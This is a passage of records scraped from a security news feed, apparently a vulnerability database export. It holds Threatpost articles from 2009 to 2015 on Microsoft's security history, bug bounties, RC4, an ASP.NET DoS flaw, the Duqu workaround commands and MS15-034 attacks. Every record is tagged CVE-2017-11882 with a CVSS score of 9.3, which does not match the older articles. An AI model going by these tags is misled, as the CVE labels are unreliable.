systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. 
The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. 
And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. 
But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft, and nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. 
Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET do the same, by modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. 
Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. 
As the modules were private and third-party, not a whole lot more information was given, but Microsoft claims the move was part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. A wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they\u2019re expecting exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communications Congress conference in Germany earlier this week, although some form of the problem has been known for several years. 
In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. 
The workaround decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible to the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. 
It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think not only about finding and fixing one-off bugs, but also about strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contract to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. 
Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give in to the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result was a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of them critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For IE 10 in beta, there were 23 submissions, 18 of which would have been rated critical, including four sandbox escapes, Moussouris said. 
The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. 
Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. 
These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. 
Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. 
Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you like or disdain Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft not only took the leap of admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today, public disclosure of serious Microsoft security holes is the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. 
Living in a world of constant interruption is detrimental to morale and to the completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advance notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high-level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. 
Spend just five minutes today and consider where you\u2019d be without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage._\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November Patch Tuesday release. 
The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. 
However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:06", "description": "LAS VEGAS\u2013In the face of mounting external pressure to begin paying bug bounties, Microsoft is instead launching a new program that will pay a $200,000 top prize to a security researcher who develops the most innovative defensive security technology. The program is designed to \u201cinspire researchers to focus their talents on defensive technologies,\u201d the company said.\n\nKnown as the Blue Hat Prize, after the company\u2019s regular internal research conferences, the program will focus in its first year on getting researchers to design a novel runtime technology to defend against memory safety vulnerabilities. 
Microsoft security officials said that rather than paying for individual bugs the way that some other companies such as Google and Mozilla do, they wanted to encourage researchers to think about ways to defeat entire classes of bugs.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d said Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nUnder the rules of the Blue Hat Prize program, any researcher 14 or older is eligible, and the researchers who win prizes will not only get the cash prize, but also will retain full intellectual property rights to the technology. The winners have to agree to license the technology to Microsoft, however.\n\nThe top prize is $200,000, with second prize paying $50,000 and third prize being a one-year MSDN subscription, which is worth $10,000. Microsoft also will fly the three winners to Black Hat next year.\n\nResearchers have been calling for [Microsoft to start a bug bounty program](<https://threatpost.com/does-microsoft-need-bug-bounties-050511/>) for several years now, and company officials have repeatedly said that Microsoft is not interested in paying for individual vulnerabilities. This new program gets around the semantics of all that by encouraging researchers to find a new way to mitigate attacks against an entire class of bugs. \n\n\u201cTwo examples of open problems that are suitable for consideration in this challenge are address space information disclosures and return-oriented programming (ROP). 
Note that you are not required to address these and you are not limited to these examples,\u201d Microsoft said in the rules for the program, which are on the [Blue Hat Prize site](<http://www.microsoft.com/security/bluehatprize/>). \n\nEntries will be judged by a panel of security experts from Microsoft teams, including the Microsoft Security Response Center, the Windows team and others. \n\nMoussouris said that Microsoft was looking for a way to inspire researchers to focus their talents on defensive technologies and not just finding bugs.\n\n\u201cThis seemed the best way for us to engage with the research community and protect customers simultaneously,\u201d she said.\n", "cvss3": {}, "published": "2011-08-03T17:34:12", "type": "threatpost", "title": "Microsoft to Pay $200,000 for Innovative Defense Technology in Blue Hat Prize Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:03", "id": "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "href": "https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/75507/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Following the lead of Mozilla and Google, Barracuda Networks is launching a bug bounty program that will pay out cash rewards for vulnerabilities found in the company\u2019s own products.\n\nThe move by Barracuda, a maker of mail security and data protection products, is the first such bug bounty program offered by a pure security technology vendor. Mozilla and Google are the two most prominent examples of general technology companies that offer rewards for vulnerabilities, and both of those companies have seen their programs succeed in the last year. 
In fact, both Google and Mozilla have raised the prices that they pay for the most severe bugs, with [Mozilla shelling out up to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>) and [Google paying as much as $3,133.7 for bugs](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nBarracuda officials said they\u2019ll match Google\u2019s top price for severe bugs and the minimum bug bounty will be $500. The company will only pay out rewards for bugs that are disclosed privately to Barracuda, although once the bug is fixed, the researcher is free to disclose it publicly. Bugs found in Barracuda\u2019s Spam and Virus Firewall, Web Filter, Web Application Firewall and NG Firewall are eligible for the cash rewards. \n\nBugs that are in scope for the reward program are vulnerabilities that compromise confidentiality, availability, integrity or authentication. Those would include vulnerabilities such as remote exploits, privilege escalation, cross-site scripting, code execution and command injection. \n\n\u201cSecurity product vendors should be at the forefront of promoting security research,\u201d Paul Judge, chief research officer at Barracuda Networks, said in a statement. \u201cThis initiative reflects our commitment to our customers and the security community at large. The goal of this program is to reward researchers for their hard work as well as to promote and encourage responsible disclosure.\u201d\n\nAs a profitable, legitimate market for vulnerability information has developed in recent years with the success of the Zero Day Initiative and other third-party brokers, there has been more and more pressure on the vendors themselves to pay for bugs. 
\n\nWhile Mozilla and Google officials have been happy with the results of their bug bounty programs\u2013[Google in fact just expanded its program to its web properties](<https://threatpost.com/google-extends-bug-bounty-web-properties-110110/>)\u2013and researchers have praised the companies for recognizing their work, other high-profile software vendors have stayed on the sidelines. Microsoft officials have repeatedly said that the company will not pay for bugs, and Apple and Adobe, which have been under increased scrutiny by attackers and researchers of late, have not offered bounties either.\n", "cvss3": {}, "published": "2010-11-09T14:28:15", "type": "threatpost", "title": "Barracuda Networks Launches Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:14:41", "id": "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "href": "https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/74652/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:02", "description": "**UPDATE** \u2013 Microsoft\u2019s characterization of [MS15-034](<https://technet.microsoft.com/library/security/MS15-034>) as a remote code execution vulnerability certainly has a lot of Windows server admins on edge waiting for the other shoe to drop.\n\nIn the three days since the bulletin was released warning of a [critical vulnerability in the HTTP protocol stack](<https://threatpost.com/microsoft-patches-critical-http-sys-vulnerability/112251>), HTTP.sys, security experts, including the SANS Institute, have warned of publicly available denial-of-service exploits targeting Microsoft IIS webservers. 
There\u2019s also the possibility of information leakage via this issue that could pave the way for more serious attacks, but for now, a crashing and rebooting IIS server might be your only sign of trouble.\n\n\u201cSo far we see active exploitation for the denial-of-service vulnerability. The information disclosure vulnerability has been demonstrated, but we have not seen it used against any of our honeypots yet, nor have we seen any reports of it being used in attacks,\u201d Johannes Ullrich of the SANS Institute told Threatpost.\n\nUllrich was quick to point out too that there are Internet-wide scans happening now, that are not just looking for vulnerable servers, but also trying to crash them.\n\n\u201cIt\u2019s extremely easy to exploit,\u201d Ullrich said during an emergency webcast last night. \u201cThat\u2019s the problem with this vulnerability, it\u2019s so easy.\u201d\n\nMicrosoft, meanwhile, said customers should prioritize this bulletin and patch as soon as possible.\n\n\u201cUpdate MS15-034 was classified as a remote code execution bulletin because, while that type of exploit is harder to carry out it is theoretically possible,\u201d said a Microsoft spokesperson.\n\nThe SANS Internet Storm Center yesterday [raised its alert level](<https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/1/>), and said active exploits were hitting its honeypots from 78[.]186[.]123[.]180. Some reported to the ISC attacks they believed were more targeted against specific webservers.\n\n\u201cIf you have been the subject of a denial-of-service attack in the past, this is a much better and easier way to achieve the same thing than doing NTP reflection or whatever against your 